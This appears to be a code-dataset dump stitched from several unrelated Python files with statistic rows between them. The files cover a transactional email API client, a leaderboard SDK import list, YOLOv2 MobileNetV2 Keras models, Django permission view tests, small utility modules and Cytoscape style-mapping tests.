if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method send_raw" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/send-raw', 'POST',
body=body_params,
response_type='object') # noqa: E501
def send_template(self, body = {}, **kwargs): # noqa: E501
"""Send using message template # noqa: E501
Send a new transactional message through the Transactional API using a template. # noqa: E501
"""
(data) = self.send_template_with_http_info(body, **kwargs) # noqa: E501
return data
def send_template_with_http_info(self, body, **kwargs): # noqa: E501
"""Send using message template # noqa: E501
Send a new transactional message through the Transactional API using a template. # noqa: E501
"""
all_params = ['body'] # noqa: E501
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method send_template" % key
)
params[key] = val
del params['kwargs']
# add api_key to body params
params['body']['key'] = self.api_key
body_params = None
if 'body' in params:
body_params = params['body']
return self.api_client.call_api(
'/messages/send-template', 'POST',
body=body_params,
response_type='list[InlineResponse20029]') # noqa: E501
| 34.526432
| 423
| 0.572249
| 1,871
| 15,675
| 4.677178
| 0.102084
| 0.091418
| 0.052794
| 0.067878
| 0.886413
| 0.874986
| 0.856245
| 0.82402
| 0.821278
| 0.812364
| 0
| 0.034755
| 0.328166
| 15,675
| 453
| 424
| 34.602649
| 0.796221
| 0.299522
| 0
| 0.664032
| 1
| 0
| 0.143807
| 0.026584
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090909
| false
| 0
| 0.01581
| 0
| 0.197628
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
892b052b556348d0f4c75a620017c9e5e580c56a
| 5,638
|
py
|
Python
|
accelbyte_py_sdk/api/leaderboard/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
accelbyte_py_sdk/api/leaderboard/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | 1
|
2021-10-13T03:46:58.000Z
|
2021-10-13T03:46:58.000Z
|
accelbyte_py_sdk/api/leaderboard/wrappers/__init__.py
|
AccelByte/accelbyte-python-sdk
|
dcd311fad111c59da828278975340fb92e0f26f7
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2021 AccelByte Inc. All Rights Reserved.
# This is licensed software from AccelByte Inc, for limitations
# and restrictions contact your company contract manager.
#
# Code generated. DO NOT EDIT!
# template file: justice_py_sdk_codegen/__main__.py
"""Auto-generated package that contains models used by the justice-leaderboard-service."""
__version__ = "2.15.5"
__author__ = "AccelByte"
__email__ = "dev@accelbyte.net"
# pylint: disable=line-too-long
from ._leaderboard_configuration import create_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import create_leaderboard_configuration_admin_v1_async
from ._leaderboard_configuration import create_leaderboard_configuration_public_v1
from ._leaderboard_configuration import create_leaderboard_configuration_public_v1_async
from ._leaderboard_configuration import delete_bulk_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import delete_bulk_leaderboard_configuration_admin_v1_async
from ._leaderboard_configuration import delete_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import delete_leaderboard_configuration_admin_v1_async
from ._leaderboard_configuration import get_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import get_leaderboard_configuration_admin_v1_async
from ._leaderboard_configuration import get_leaderboard_configurations_admin_v1
from ._leaderboard_configuration import get_leaderboard_configurations_admin_v1_async
from ._leaderboard_configuration import get_leaderboard_configurations_public_v1
from ._leaderboard_configuration import get_leaderboard_configurations_public_v1_async
from ._leaderboard_configuration import get_leaderboard_configurations_public_v2
from ._leaderboard_configuration import get_leaderboard_configurations_public_v2_async
from ._leaderboard_configuration import update_leaderboard_configuration_admin_v1
from ._leaderboard_configuration import update_leaderboard_configuration_admin_v1_async
from ._leaderboard_data import admin_get_archived_leaderboard_ranking_data_v1_handler
from ._leaderboard_data import admin_get_archived_leaderboard_ranking_data_v1_handler_async
from ._leaderboard_data import create_archived_leaderboard_ranking_data_v1_handler
from ._leaderboard_data import create_archived_leaderboard_ranking_data_v1_handler_async
from ._leaderboard_data import delete_user_ranking_admin_v1
from ._leaderboard_data import delete_user_ranking_admin_v1_async
from ._leaderboard_data import delete_user_ranking_public_v1
from ._leaderboard_data import delete_user_ranking_public_v1_async
from ._leaderboard_data import delete_user_rankings_admin_v1
from ._leaderboard_data import delete_user_rankings_admin_v1_async
from ._leaderboard_data import get_all_time_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_all_time_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_all_time_leaderboard_ranking_public_v1
from ._leaderboard_data import get_all_time_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_all_time_leaderboard_ranking_public_v2
from ._leaderboard_data import get_all_time_leaderboard_ranking_public_v2_async
from ._leaderboard_data import get_archived_leaderboard_ranking_data_v1_handler
from ._leaderboard_data import get_archived_leaderboard_ranking_data_v1_handler_async
from ._leaderboard_data import get_current_month_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_current_month_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_current_month_leaderboard_ranking_public_v1
from ._leaderboard_data import get_current_month_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_current_season_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_current_season_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_current_season_leaderboard_ranking_public_v1
from ._leaderboard_data import get_current_season_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_current_week_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_current_week_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_current_week_leaderboard_ranking_public_v1
from ._leaderboard_data import get_current_week_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_today_leaderboard_ranking_admin_v1
from ._leaderboard_data import get_today_leaderboard_ranking_admin_v1_async
from ._leaderboard_data import get_today_leaderboard_ranking_public_v1
from ._leaderboard_data import get_today_leaderboard_ranking_public_v1_async
from ._leaderboard_data import get_user_ranking_admin_v1
from ._leaderboard_data import get_user_ranking_admin_v1_async
from ._leaderboard_data import get_user_ranking_public_v1
from ._leaderboard_data import get_user_ranking_public_v1_async
from ._leaderboard_data import update_user_point_admin_v1
from ._leaderboard_data import update_user_point_admin_v1_async
from ._user_data import get_user_leaderboard_rankings_admin_v1
from ._user_data import get_user_leaderboard_rankings_admin_v1_async
from ._user_visibility import get_hidden_users_v2
from ._user_visibility import get_hidden_users_v2_async
from ._user_visibility import get_user_visibility_status_v2
from ._user_visibility import get_user_visibility_status_v2_async
from ._user_visibility import set_user_leaderboard_visibility_status_v2
from ._user_visibility import set_user_leaderboard_visibility_status_v2_async
from ._user_visibility import set_user_visibility_status_v2
from ._user_visibility import set_user_visibility_status_v2_async
| 64.068182
| 92
| 0.919652
| 768
| 5,638
| 6.075521
| 0.114583
| 0.186455
| 0.16288
| 0.214316
| 0.926275
| 0.92306
| 0.919846
| 0.917703
| 0.900557
| 0.578654
| 0
| 0.014345
| 0.060305
| 5,638
| 87
| 93
| 64.804598
| 0.866365
| 0.065271
| 0
| 0
| 1
| 0
| 0.006086
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.957746
| 0
| 0.957746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
893b30389a15648b9184604dd7f219b22fc0f23c
| 3,944
|
py
|
Python
|
yolo2/models/yolo2_mobilenetv2.py
|
grifon-239/diploma
|
bdf02f9f5e279516920189da17c256776a9d5b02
|
[
"MIT"
] | 2
|
2021-01-26T23:03:47.000Z
|
2021-05-04T16:11:34.000Z
|
yolo2/models/yolo2_mobilenetv2.py
|
acobo/keras-YOLOv3-model-set
|
6d7f7f2474dda43c112a9e0321447109a446ac69
|
[
"MIT"
] | null | null | null |
yolo2/models/yolo2_mobilenetv2.py
|
acobo/keras-YOLOv3-model-set
|
6d7f7f2474dda43c112a9e0321447109a446ac69
|
[
"MIT"
] | 2
|
2020-07-07T16:30:59.000Z
|
2020-10-05T06:07:22.000Z
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""YOLO_v2 MobileNetV2 Model Defined in Keras."""
from tensorflow.keras.layers import MaxPooling2D, Lambda, Concatenate, GlobalAveragePooling2D, Softmax
from tensorflow.keras.models import Model
from tensorflow.keras.applications.mobilenet_v2 import MobileNetV2
from yolo2.models.layers import compose, DarknetConv2D, DarknetConv2D_BN_Leaky, Depthwise_Separable_Conv2D_BN_Leaky, bottleneck_block, bottleneck_x2_block, space_to_depth_x2, space_to_depth_x2_output_shape
def yolo2_mobilenetv2_body(inputs, num_anchors, num_classes, alpha=1.0):
"""Create YOLO_V2 MobileNetV2 model CNN body in Keras."""
mobilenetv2 = MobileNetV2(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
# input: 416 x 416 x 3
# mobilenetv2.output : 13 x 13 x 1280
# block_13_expand_relu(layers[119]) : 26 x 26 x (576*alpha)
conv_head1 = compose(
DarknetConv2D_BN_Leaky(1280, (3, 3)),
DarknetConv2D_BN_Leaky(1280, (3, 3)))(mobilenetv2.output)
# block_13_expand_relu output shape: 26 x 26 x (576*alpha)
block_13_expand_relu = mobilenetv2.layers[119].output
conv_head2 = DarknetConv2D_BN_Leaky(int(64*alpha), (1, 1))(block_13_expand_relu)
# TODO: Allow Keras Lambda to use func arguments for output_shape?
conv_head2_reshaped = Lambda(
space_to_depth_x2,
output_shape=space_to_depth_x2_output_shape,
name='space_to_depth')(conv_head2)
x = Concatenate()([conv_head2_reshaped, conv_head1])
x = DarknetConv2D_BN_Leaky(1280, (3, 3))(x)
x = DarknetConv2D(num_anchors * (num_classes + 5), (1, 1), name='predict_conv')(x)
return Model(inputs, x)
def yolo2lite_mobilenetv2_body(inputs, num_anchors, num_classes, alpha=1.0):
"""Create YOLO_V2 Lite MobileNetV2 model CNN body in Keras."""
mobilenetv2 = MobileNetV2(input_tensor=inputs, weights='imagenet', include_top=False, alpha=alpha)
# input: 416 x 416 x 3
# mobilenetv2.output : 13 x 13 x 1280
# block_13_expand_relu(layers[119]) : 26 x 26 x (576*alpha)
conv_head1 = compose(
Depthwise_Separable_Conv2D_BN_Leaky(1280, (3, 3)),
Depthwise_Separable_Conv2D_BN_Leaky(1280, (3, 3)))(mobilenetv2.output)
# block_13_expand_relu output shape: 26 x 26 x (576*alpha)
block_13_expand_relu = mobilenetv2.layers[119].output
conv_head2 = DarknetConv2D_BN_Leaky(int(64*alpha), (1, 1))(block_13_expand_relu)
# TODO: Allow Keras Lambda to use func arguments for output_shape?
conv_head2_reshaped = Lambda(
space_to_depth_x2,
output_shape=space_to_depth_x2_output_shape,
name='space_to_depth')(conv_head2)
x = Concatenate()([conv_head2_reshaped, conv_head1])
x = Depthwise_Separable_Conv2D_BN_Leaky(1280, (3, 3))(x)
x = DarknetConv2D(num_anchors * (num_classes + 5), (1, 1), name='predict_conv')(x)
return Model(inputs, x)
def tiny_yolo2_mobilenetv2_body(inputs, num_anchors, num_classes):
"""Create Tiny YOLO_V2 MobileNetV2 model CNN body in Keras."""
mobilenetv2 = MobileNetV2(input_tensor=inputs, weights='imagenet', include_top=False, alpha=1.0)
# input: 416 x 416 x 3
# mobilenetv2.output : 13 x 13 x 1280
y = compose(
DarknetConv2D_BN_Leaky(1280, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv'))(mobilenetv2.output)
return Model(inputs, y)
def tiny_yolo2lite_mobilenetv2_body(inputs, num_anchors, num_classes):
"""Create Tiny YOLO_V2 Lite MobileNetV2 model CNN body in Keras."""
mobilenetv2 = MobileNetV2(input_tensor=inputs, weights='imagenet', include_top=False, alpha=1.0)
# input: 416 x 416 x 3
# mobilenetv2.output : 13 x 13 x 1280
y = compose(
Depthwise_Separable_Conv2D_BN_Leaky(1280, (3,3)),
DarknetConv2D(num_anchors*(num_classes+5), (1,1), name='predict_conv'))(mobilenetv2.output)
return Model(inputs, y)
| 42.408602
| 205
| 0.721602
| 568
| 3,944
| 4.741197
| 0.158451
| 0.031192
| 0.035648
| 0.059413
| 0.861493
| 0.849981
| 0.835871
| 0.835871
| 0.78834
| 0.765689
| 0
| 0.082799
| 0.170132
| 3,944
| 92
| 206
| 42.869565
| 0.739994
| 0.22997
| 0
| 0.73913
| 0
| 0
| 0.036048
| 0
| 0
| 0
| 0
| 0.01087
| 0
| 1
| 0.086957
| false
| 0
| 0.086957
| 0
| 0.26087
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
894de622d7ad1a7530460e77d6537e12e2b358bc
| 4,390
|
py
|
Python
|
accounts/tests/test_user_views.py
|
Fabrice-64/advocacy_project
|
33eb8b71e057ea197be578020436defb015fa000
|
[
"MIT"
] | null | null | null |
accounts/tests/test_user_views.py
|
Fabrice-64/advocacy_project
|
33eb8b71e057ea197be578020436defb015fa000
|
[
"MIT"
] | null | null | null |
accounts/tests/test_user_views.py
|
Fabrice-64/advocacy_project
|
33eb8b71e057ea197be578020436defb015fa000
|
[
"MIT"
] | null | null | null |
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Permission
from django.urls import reverse_lazy
from accounts.models import CustomUser, Volunteer
class VolunteerListViewTest(TestCase):
def setUp(self):
self.url = reverse_lazy('volunteer_list')
self.user1 = CustomUser.objects.create(username="test_user", password="pwd", is_active=True)
self.response = self.client.get(self.url)
def test_volunteer_list_view_not_authorized(self):
# Only members can get access to volunteer list
self.assertEqual(self.response.status_code, 302)
self.assertRedirects(
self.response,
'/accounts/login/?next=/accounts/volunteer/list/')
def test_volunteer_list_view_authorized(self):
perm = Permission.objects.get(codename="view_volunteer")
self.user1.user_permissions.add(perm)
self.client.force_login(self.user1)
self.response = self.client.get(self.url)
self.assertEqual(self.response.status_code, 200)
self.assertContains(self.response, "Bénévoles")
class VolunteerDetailViewTest(TestCase):
def setUp(self):
self.user1 = CustomUser.objects.create(
username="test_user", password="pwd",
is_active=True, status_type="MANAGER")
self.volunteer = Volunteer.objects.create(
username="test_user2", password="pwd",
is_active=True, status_type="VOLUNTEER")
def test_volunteer_detail_view_not_authorized(self):
# Only members can get access to volunteer detail
perm = Permission.objects.get(codename="view_volunteer")
self.user1.user_permissions.remove(perm)
self.response = self.client.get(self.volunteer.get_absolute_url())
self.assertEqual(self.response.status_code, 302)
def test_volunteer_detail_view_authorized(self):
perm = Permission.objects.get(codename="view_volunteer")
self.user1.user_permissions.add(perm)
self.client.force_login(self.user1)
self.response = self.client.get(self.volunteer.get_absolute_url())
self.assertEqual(self.response.status_code, 200)
self.assertContains(self.response, "volunteer-details")
class StaffListViewTest(TestCase):
def setUp(self):
self.url = reverse_lazy('staff_list')
self.user1 = CustomUser.objects.create(
username="test_user",
password="pwd", is_active=True)
self.response = self.client.get(self.url)
def test_staff_list_view_not_authorized(self):
# Only members can get access to volunteer list
self.assertEqual(self.response.status_code, 302)
self.assertRedirects(
self.response,
'/accounts/login/?next=/accounts/staff/list/')
def test_staff_list_view_authorized(self):
perm = Permission.objects.get(codename="view_employee")
self.user1.user_permissions.add(perm)
self.client.force_login(self.user1)
self.response = self.client.get(self.url)
self.assertEqual(self.response.status_code, 200)
self.assertContains(self.response, "Membres du Personnel")
class StaffDetailViewTest(TestCase):
def setUp(self):
self.user1 = CustomUser.objects.create(
username="test_user",
password="pwd", is_active=True,
status_type="MANAGER")
self.employee = CustomUser.objects.create(
username="test_user2",
password="pwd", is_active=True,
status_type="EMPLOYEE")
def test_staff_detail_view_not_authorized(self):
# Only members can get access to volunteer detail
perm = Permission.objects.get(codename="view_employee")
self.user1.user_permissions.remove(perm)
self.response = self.client.get(
self.employee.get_absolute_url())
self.assertEqual(self.response.status_code, 302)
def test_staff_detail_view_authorized(self):
perm = Permission.objects.get(codename="view_employee")
self.user1.user_permissions.add(perm)
self.client.force_login(self.user1)
self.response = self.client.get(
self.employee.get_absolute_url())
self.assertEqual(self.response.status_code, 200)
self.assertContains(self.response, "employee-details")
| 39.909091
| 100
| 0.689977
| 521
| 4,390
| 5.639155
| 0.142035
| 0.089857
| 0.043567
| 0.059905
| 0.854663
| 0.822668
| 0.822668
| 0.822668
| 0.796801
| 0.796801
| 0
| 0.011478
| 0.20615
| 4,390
| 109
| 101
| 40.275229
| 0.831564
| 0.042597
| 0
| 0.576471
| 0
| 0
| 0.086232
| 0.021439
| 0
| 0
| 0
| 0
| 0.164706
| 1
| 0.141176
| false
| 0.070588
| 0.058824
| 0
| 0.247059
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
8973b150903ddf40bffb9e87cee394e87eaacda0
| 170
|
py
|
Python
|
bitflyer/utils.py
|
tracer0tong/bitflyer
|
6f204ccb5d597908e5f52b32c58cabcc232e67aa
|
[
"MIT"
] | null | null | null |
bitflyer/utils.py
|
tracer0tong/bitflyer
|
6f204ccb5d597908e5f52b32c58cabcc232e67aa
|
[
"MIT"
] | null | null | null |
bitflyer/utils.py
|
tracer0tong/bitflyer
|
6f204ccb5d597908e5f52b32c58cabcc232e67aa
|
[
"MIT"
] | 1
|
2021-05-03T06:50:57.000Z
|
2021-05-03T06:50:57.000Z
|
import time
def make_nonce():
'''
return utc unix time in second
TODO:
- return utc unix time in micro second
'''
return str(int(time.time()))
| 14.166667
| 42
| 0.6
| 24
| 170
| 4.208333
| 0.583333
| 0.178218
| 0.257426
| 0.336634
| 0.376238
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.294118
| 170
| 11
| 43
| 15.454545
| 0.841667
| 0.447059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
9843f3e655a9af93de9a34859bfeb1c451bf6a6e
| 197
|
py
|
Python
|
py_headless_daw/production/producer_interface.py
|
hq9000/py-headless-daw
|
33e08727c25d3f00b2556adf5f25c9f7ff4d4304
|
[
"MIT"
] | 22
|
2020-06-09T18:46:56.000Z
|
2021-09-28T02:11:42.000Z
|
py_headless_daw/production/producer_interface.py
|
hq9000/py-headless-daw
|
33e08727c25d3f00b2556adf5f25c9f7ff4d4304
|
[
"MIT"
] | 19
|
2020-06-03T06:34:57.000Z
|
2021-01-26T07:36:17.000Z
|
py_headless_daw/production/producer_interface.py
|
hq9000/py-headless-daw
|
33e08727c25d3f00b2556adf5f25c9f7ff4d4304
|
[
"MIT"
] | 1
|
2020-06-18T09:25:21.000Z
|
2020-06-18T09:25:21.000Z
|
from abc import ABC, abstractmethod
from py_headless_daw.project.project import Project
class ProducerInterface(ABC):
@abstractmethod
def generate_project(self) -> Project:
pass
| 19.7
| 51
| 0.756345
| 23
| 197
| 6.347826
| 0.608696
| 0.232877
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.182741
| 197
| 9
| 52
| 21.888889
| 0.906832
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.166667
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
984cf93f89b99207240dcec8935c8f7a70d0d98c
| 89
|
py
|
Python
|
sysscribe/disk.py
|
zenotech/SysScribe
|
8cabfc9718e7ccc6d217fbcfc158dd255b28c9b1
|
[
"BSD-3-Clause"
] | null | null | null |
sysscribe/disk.py
|
zenotech/SysScribe
|
8cabfc9718e7ccc6d217fbcfc158dd255b28c9b1
|
[
"BSD-3-Clause"
] | 1
|
2017-05-08T19:18:05.000Z
|
2017-05-08T19:18:05.000Z
|
sysscribe/disk.py
|
zenotech/SysScribe
|
8cabfc9718e7ccc6d217fbcfc158dd255b28c9b1
|
[
"BSD-3-Clause"
] | null | null | null |
from sysscribe import detect_dev_sizes
def disk_sizes():
return detect_dev_sizes()
| 14.833333
| 38
| 0.786517
| 13
| 89
| 5
| 0.692308
| 0.276923
| 0.430769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157303
| 89
| 5
| 39
| 17.8
| 0.866667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
|
0
| 8
|
98676711ffce9ab6929cf75bbdc1b81ac05284aa
| 78,707
|
py
|
Python
|
tests/test_style_mappings.py
|
bdemchak/py4cytoscape
|
c0f6c13e00928c05485fa2bcc35d292418d3738a
|
[
"MIT"
] | 3
|
2020-05-07T19:51:11.000Z
|
2020-08-12T09:21:43.000Z
|
tests/test_style_mappings.py
|
bdemchak/py4cytoscape
|
c0f6c13e00928c05485fa2bcc35d292418d3738a
|
[
"MIT"
] | 11
|
2020-05-07T15:49:03.000Z
|
2020-08-20T19:57:23.000Z
|
tests/test_style_mappings.py
|
bdemchak/py4cytoscape
|
c0f6c13e00928c05485fa2bcc35d292418d3738a
|
[
"MIT"
] | 3
|
2020-05-26T18:35:57.000Z
|
2020-08-19T09:51:19.000Z
|
# -*- coding: utf-8 -*-
""" Test functions in style_mappings.py.
"""
"""License:
Copyright 2020-2022 The Cytoscape Consortium
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import unittest
import pandas as df
import time
from requests import RequestException
from test_utils import *
class StyleMappingsTests(unittest.TestCase):
def setUp(self):
try:
close_session(False)
# delete_all_networks()
except:
pass
def tearDown(self):
pass
_GAL_FILTERED_STYLE = 'galFiltered Style'
@print_entry_exit
def test_map_visual_property(self):
# Initialization
load_test_session()
# Verify continuous property with points list matching color list
res = map_visual_property('node fill color', 'gal1RGexp', 'c', [-2.426, 0.0, 2.058],
['#0066CC', '#FFFFFF', '#FFFF00'])
self._check_property(res, 'NODE_FILL_COLOR', 'gal1RGexp', 'Double', 'continuous',
[{'value': -2.426, 'lesser': '#0066CC', 'equal': '#0066CC', 'greater': '#0066CC'},
{'value': 0.0, 'lesser': '#FFFFFF', 'equal': '#FFFFFF', 'greater': '#FFFFFF'},
{'value': 2.058, 'lesser': '#FFFF00', 'equal': '#FFFF00', 'greater': '#FFFF00'}])
# Verify continuous property with points list bracketed on either side by colors
res = map_visual_property('node fill color', 'gal1RGexp', 'c', [-2.426, 0.0, 2.058],
['#000000', '#0066CC', '#FFFFFF', '#FFFF00', '#FFFFFF'])
self._check_property(res, 'NODE_FILL_COLOR', 'gal1RGexp', 'Double', 'continuous',
[{'value': -2.426, 'lesser': '#000000', 'equal': '#0066CC', 'greater': '#0066CC'},
{'value': 0.0, 'lesser': '#FFFFFF', 'equal': '#FFFFFF', 'greater': '#FFFFFF'},
{'value': 2.058, 'lesser': '#FFFF00', 'equal': '#FFFF00', 'greater': '#FFFFFF'}])
# Verify discrete mapping to two values
res = map_visual_property('node shape', 'degree.layout', 'd', [1, 2], ['ellipse', 'rectangle'])
self._check_property(res, 'NODE_SHAPE', 'degree.layout', 'Integer', 'discrete',
[{'key': 1, 'value': 'ellipse'}, {'key': 2, 'value': 'rectangle'}])
# Verify passthru of node string value
res = map_visual_property('node label', 'COMMON', 'p')
self._check_property(res, 'NODE_LABEL', 'COMMON', 'String', 'passthrough')
# Verify passthru of node integer value
res = map_visual_property('node label', 'degree.layout', 'p')
self._check_property(res, 'NODE_LABEL', 'degree.layout', 'Integer', 'passthrough')
# Verify discrete mapping of edge string value
res = map_visual_property('Edge Target Arrow Shape', 'interaction', 'd', ['pp', 'pd'], ['Arrow', 'T'])
self._check_property(res, 'EDGE_TARGET_ARROW_SHAPE', 'interaction', 'String', 'discrete',
[{'key': 'pp', 'value': 'Arrow'}, {'key': 'pd', 'value': 'T'}])
# Verify passthru mapping of edge double value
res = map_visual_property('edge width', 'EdgeBetweenness', 'p')
self._check_property(res, 'EDGE_WIDTH', 'EdgeBetweenness', 'Double', 'passthrough')
# Verify that unknown type acts like passthru
res = map_visual_property('edge width', 'EdgeBetweenness', 'junktype')
self._check_property(res, 'EDGE_WIDTH', 'EdgeBetweenness', 'Double', 'junktype')
# Verify that unknown property, column or bad continuous mapping are caught
self.assertRaises(CyError, map_visual_property, 'bogus property', 'EdgeBetweenness', 'p')
self.assertRaises(CyError, map_visual_property, 'edge width', 'bogus column', 'p')
self.assertRaises(CyError, map_visual_property, 'node fill color', 'gal1RGexp', 'c',
[-10.0, -2.426, 0.0, 2.058], ['#0066CC', '#FFFFFF', '#FFFF00'])
@print_entry_exit
def test_get_style_all_mappings(self):
# Initialization
load_test_session()
# Verify that a plausible style can be fetched (... in this case, discrete mapping isn't present)
res = get_style_all_mappings(self._GAL_FILTERED_STYLE)
indexed_properties = {prop['visualProperty']: prop for prop in res}
self._check_property(indexed_properties['NODE_LABEL'], 'NODE_LABEL', 'COMMON', 'String', 'passthrough')
self._check_property(indexed_properties['NODE_SIZE'], 'NODE_SIZE', 'degree.layout', 'Number', 'continuous',
[{'value': 1.0, 'lesser': '1.0', 'equal': '40.0', 'greater': '40.0'},
{'value': 18.0, 'lesser': '150.0', 'equal': '150.0', 'greater': '1.0'}])
self._check_property(indexed_properties['NODE_FILL_COLOR'], 'NODE_FILL_COLOR', 'gal1RGexp', 'Number',
'continuous',
[{'value': -2.426, 'lesser': '#0066CC', 'equal': '#0066CC', 'greater': '#0066CC'},
{'value': 1.225471493171426e-07, 'lesser': '#FFFFFF', 'equal': '#FFFFFF',
'greater': '#FFFFFF'},
{'value': 2.058, 'lesser': '#FFFF00', 'equal': '#FFFF00', 'greater': '#FFFF00'}])
self._check_property(indexed_properties['NODE_LABEL_FONT_SIZE'], 'NODE_LABEL_FONT_SIZE', 'Degree', 'Number',
'continuous', [{'value': 1.0, 'lesser': '1', 'equal': '10', 'greater': '10'},
{'value': 18.0, 'lesser': '40', 'equal': '40', 'greater': '1'}])
# Verify that an invalid style is caught
self.assertRaises(CyError, get_style_all_mappings, 'bogus style')
@print_entry_exit
def test_get_style_mapping(self):
# Initialization
load_test_session()
# Get all of the properties in a list
res = get_style_all_mappings(self._GAL_FILTERED_STYLE)
indexed_properties = {prop['visualProperty']: prop for prop in res}
# Fetch each property and verify it matches the one in the list
for prop_name in indexed_properties:
res = get_style_mapping(self._GAL_FILTERED_STYLE, prop_name)
indexed_prop = indexed_properties[prop_name]
cargo = indexed_prop['map'] if 'map' in indexed_prop else \
indexed_prop['points'] if 'points' in indexed_prop else \
None
self._check_property(res, indexed_prop['visualProperty'], indexed_prop['mappingColumn'],
indexed_prop['mappingColumnType'], indexed_prop['mappingType'], cargo)
# Verify that an invalid style or property is caught
self.assertRaises(CyError, get_style_mapping, 'bogus style', 'NODE_SIZE')
self.assertRaises(CyError, get_style_mapping, self._GAL_FILTERED_STYLE, 'bogus property')
